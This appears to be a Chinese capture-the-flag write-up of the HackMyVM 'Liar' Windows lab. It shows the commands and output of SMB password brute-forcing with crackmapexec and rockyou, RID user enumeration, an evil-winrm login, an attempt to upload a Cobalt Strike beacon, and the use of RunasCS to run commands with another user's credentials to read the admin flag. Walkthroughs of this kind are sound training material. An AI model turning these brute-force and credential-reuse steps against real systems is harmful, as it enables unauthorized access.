24.liar
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=Liar
作者:[sml](https://hackmyvm.eu/profile/?user=sml)
难度:⭐️⭐️
知识点:rid爆破、RunasCS.exe工具
2. 信息收集
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# fscan -h 192.168.56.16
\_\_\_ \_
/ \_ \ \_\_\_ \_\_\_ \_ \_\_ \_\_ \_ \_\_\_| | \_\_
/ /\_\/\_\_\_\_/ \_\_|/ \_\_| '\_\_/ \_ |/ \_\_| |/ /
/ /\_\\\_\_\_\_\_\\_\_ \ (\_\_| | | (\_| | (\_\_| <
\\_\_\_\_/ |\_\_\_/\\_\_\_|\_| \\_\_,\_|\\_\_\_|\_|\\_\
fscan version: 1.8.4
start infoscan
192.168.56.16:445 open
192.168.56.16:139 open
192.168.56.16:80 open
192.168.56.16:135 open
[\*] alive ports len is: 4
start vulscan
[\*] NetBios 192.168.56.16 WORKGROUP\WIN-IURF14RBVGV
[\*] NetInfo
[\*]192.168.56.16
[->]WIN-IURF14RBVGV
[->]192.168.56.16
[\*] WebTitle http://192.168.56.16 code:200 len:63 title:None
已完成 4/4
[\*] 扫描结束,耗时: 2.331772501s
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# nmap -sC -sV 192.168.56.16 -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 12:55 CST
Nmap scan report for 192.168.56.16
Host is up (0.00019s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|\_http-title: Site doesn't have a title (text/html).
| http-methods:
|\_ Potentially risky methods: TRACE
|\_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
MAC Address: 08:00:27:2F:A2:49 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|\_nbstat: NetBIOS name: WIN-IURF14RBVGV, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:2f:a2:49 (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-11-20T20:35:07
|\_ start\_date: N/A
|\_clock-skew: -8h20m33s
| smb2-security-mode:
| 3:1:1:
|\_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.10 seconds
这里只给了一个机器名
就不用配置hosts了
难得win靶机开了一个网页,看着不像是打域渗透的
还是先看看网页吧,获取到一个用户
nica
扫一波目录试试
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# dirsearch -u http://192.168.56.16
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg\_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg\_resources.html
from pkg\_resources import DistributionNotFound, VersionConflict
\_|. \_ \_ \_ \_ \_ \_|\_ v0.4.3
(\_||| \_) (/\_(\_|| (\_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/hmv/liar/reports/http\_192.168.56.16/\_24-11-21\_13-01-05.txt
Target: http://192.168.56.16/
[13:01:05] Starting:
[13:01:05] 403 - 312B - /%2e%2e//google.com
[13:01:05] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[13:01:07] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[13:01:11] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Task Completed
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# gobuster dir -u http://192.168.56.16 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.16
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,php,html,png,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 1453501 / 1453508 (100.00%)
===============================================================
Finished
===============================================================
没有什么东西啊
3. SMB探测
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# smbmap -u guest -H 192.168.56.16
\_\_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_ \_\_\_\_\_\_\_
/" )|" \ /" || \_ "\ |" \ /" | /""\ | \_\_ "\
(: \\_\_\_/ \ \ // |(. |\_) :) \ \ // | / \ (. |\_\_) :)
\\_\_\_ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: \_\_\_\_/
\_\_/ \ |: \. |(| \_ \ |: \. | // \_\_' \ (| /
/" \ :) |. \ /: ||: |\_) :)|. \ /: | / / \ \ /|\_\_/ \
(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_/ \\_\_\_)(\_\_\_\_\_\_\_)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\*] Detected 1 hosts serving SMB
[\*] Established 0 SMB session(s)
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# smbmap -u anonymous -H 192.168.56.16
\_\_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_ \_\_\_\_\_\_\_
/" )|" \ /" || \_ "\ |" \ /" | /""\ | \_\_ "\
(: \\_\_\_/ \ \ // |(. |\_) :) \ \ // | / \ (. |\_\_) :)
\\_\_\_ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: \_\_\_\_/
\_\_/ \ |: \. |(| \_ \ |: \. | // \_\_' \ (| /
/" \ :) |. \ /: ||: |\_) :)|. \ /: | / / \ \ /|\_\_/ \
(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_/ \\_\_\_)(\_\_\_\_\_\_\_)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\*] Detected 1 hosts serving SMB
[\*] Established 0 SMB session(s)
不存在匿名登录与来宾登录
尝试对用户nica进行爆破看看
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# crackmapexec smb 192.168.56.16 -u nica -p /usr/share/wordlists/rockyou.txt |grep +
SMB 192.168.56.16 445 WIN-IURF14RBVGV [+] WIN-IURF14RBVGV\nica:hardcore
成功获取到用户的密码hardcore
SMB共享看一下
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# smbmap -u nica -p hardcore -H 192.168.56.16
\_\_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_ \_\_\_\_\_\_\_
/" )|" \ /" || \_ "\ |" \ /" | /""\ | \_\_ "\
(: \\_\_\_/ \ \ // |(. |\_) :) \ \ // | / \ (. |\_\_) :)
\\_\_\_ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: \_\_\_\_/
\_\_/ \ |: \. |(| \_ \ |: \. | // \_\_' \ (| /
/" \ :) |. \ /: ||: |\_) :)|. \ /: | / / \ \ /|\_\_/ \
(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_/ \\_\_\_)(\_\_\_\_\_\_\_)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\*] Detected 1 hosts serving SMB
[\*] Established 1 SMB session(s)
[+] IP: 192.168.56.16:445 Name: 192.168.56.16 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# smbclient -U 'nica' //192.168.56.16/IPC$
Password for [WORKGROUP\nica]:
Try "help" to get a list of possible commands.
smb: \> ls
NT\_STATUS\_NO\_SUCH\_FILE listing \\*
smb: \>
好吧,什么都没有
4. 相对标识符(RID)暴力枚举出域内的其他用户
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# crackmapexec smb 192.168.56.16 -u nica -p hardcore --rid-brute >rid\_brute\_user.txt
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# wc -l rid\_brute\_user.txt
11 rid\_brute\_user.txt
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# cat rid\_brute\_user.txt
SMB 192.168.56.16 445 WIN-IURF14RBVGV [\*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)
SMB 192.168.56.16 445 WIN-IURF14RBVGV [+] WIN-IURF14RBVGV\nica:hardcore
SMB 192.168.56.16 445 WIN-IURF14RBVGV [+] Brute forcing RIDs
SMB 192.168.56.16 445 WIN-IURF14RBVGV 500: WIN-IURF14RBVGV\Administrador (SidTypeUser)
SMB 192.168.56.16 445 WIN-IURF14RBVGV 501: WIN-IURF14RBVGV\Invitado (SidTypeUser)
SMB 192.168.56.16 445 WIN-IURF14RBVGV 503: WIN-IURF14RBVGV\DefaultAccount (SidTypeUser)
SMB 192.168.56.16 445 WIN-IURF14RBVGV 504: WIN-IURF14RBVGV\WDAGUtilityAccount (SidTypeUser)
SMB 192.168.56.16 445 WIN-IURF14RBVGV 513: WIN-IURF14RBVGV\Ninguno (SidTypeGroup)
SMB 192.168.56.16 445 WIN-IURF14RBVGV 1000: WIN-IURF14RBVGV\nica (SidTypeUser)
SMB 192.168.56.16 445 WIN-IURF14RBVGV 1001: WIN-IURF14RBVGV\akanksha (SidTypeUser)
SMB 192.168.56.16 445 WIN-IURF14RBVGV 1002: WIN-IURF14RBVGV\Idministritirs (SidTypeAlias)
可以发现还有一个用户是akanksha
再爆破一波这个用户的密码
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# crackmapexec smb 192.168.56.16 -u akanksha -p /usr/share/wordlists/rockyou.txt |grep +
SMB 192.168.56.16 445 WIN-IURF14RBVGV [+] WIN-IURF14RBVGV\akanksha:sweetgirl
ok,获取到了密码 sweetgirl
看看smb共享
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# smbmap -u akanksha -p sweetgirl -H 192.168.56.16
\_\_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_ \_\_\_\_\_\_\_
/" )|" \ /" || \_ "\ |" \ /" | /""\ | \_\_ "\
(: \\_\_\_/ \ \ // |(. |\_) :) \ \ // | / \ (. |\_\_) :)
\\_\_\_ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: \_\_\_\_/
\_\_/ \ |: \. |(| \_ \ |: \. | // \_\_' \ (| /
/" \ :) |. \ /: ||: |\_) :)|. \ /: | / / \ \ /|\_\_/ \
(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_/ \\_\_\_)(\_\_\_\_\_\_\_)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\*] Detected 1 hosts serving SMB
[\*] Established 1 SMB session(s)
[+] IP: 192.168.56.16:445 Name: 192.168.56.16 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# smbclient -U akanksha //192.168.56.16/IPC$
Password for [WORKGROUP\akanksha]:
Try "help" to get a list of possible commands.
smb: \> ls
NT\_STATUS\_NO\_SUCH\_FILE listing \\*
还是什么都没有。我测
虽然SMB搞不了。
看看能不能winrm连上去
检测一下WinRM服务
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# nmap -p 5985,5986 -sT 192.168.56.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 13:39 CST
Nmap scan report for 192.168.56.16
Host is up (0.00025s latency).
PORT STATE SERVICE
5985/tcp open wsman
5986/tcp closed wsmans
MAC Address: 08:00:27:2F:A2:49 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
可以发现http的非加密端口是开放的。https的端口关闭
直接用evil-winrm试试连接
┌──(root㉿kali)-[/home/kali/hmv/liar]
└─# evil-winrm -i 192.168.56.16 -u nica -p hardcore
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting\_detection\_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
\*Evil-WinRM\* PS C:\Users\nica\Documents>
nica用户可以登录,akanksha登录不了
在nica用户目录下获取flag
\*Evil-WinRM\* PS C:\users\nica> type user.txt
HMVWINGIFT
直接上CS
\*Evil-WinRM\* PS C:\users\nica> upload /home/kali/hmv/liar/4444.exe
Info: Uploading /home/kali/hmv/liar/4444.exe to C:\users\nica\4444.exe
Data: 394580 bytes of 394580 bytes copied
Info: Upload successful!
纳尼。运行不了。我测
5. RunasCS.exe
看了一下wp 原来可以用RunasCS.exe
这个工具允许我们当前用户用另外一个用户的权限执行命令,前提是需要另一个用户的账号密码
这里我们刚好满足,因为akanksha用户无法winrm登录。但是我们知道他的密码那我们就可以以他的权限执行命令
\*Evil-WinRM\* PS C:\users\nica> .\runascs.exe akanksha sweetgirl "cmd /c whoami /all"
INFORMACIàN DE USUARIO
----------------------
Nombre de usuario SID
======================== ==============================================
win-iurf14rbvgv\akanksha S-1-5-21-2519875556-2276787807-2868128514-1001
INFORMACIàN DE GRUPO
--------------------
Nombre de grupo Tipo SID Atributos
============================================ ============== ============================================== ========================================================================
Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
WIN-IURF14RBVGV\Idministritirs Alias S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\INTERACTIVE Grupo conocido S-1-5-4 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
INICIO DE SESIàN EN LA CONSOLA Grupo conocido S-1-2-1 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compa¤¡a Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Cuenta local Grupo conocido S-1-5-113 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticaci¢n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio Etiqueta S-1-16-8192
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= ============================================ =============
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado
WIN-IURF14RBVGV\Idministritirs Alias S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo
可以发现这个用户是属于管理员组的
直接读取flag
\*Evil-WinRM\* PS C:\users\nica> .\runascs.exe akanksha sweetgirl "cmd /c type c:\users\Administrador\root.txt"
HMV1STWINDOWZ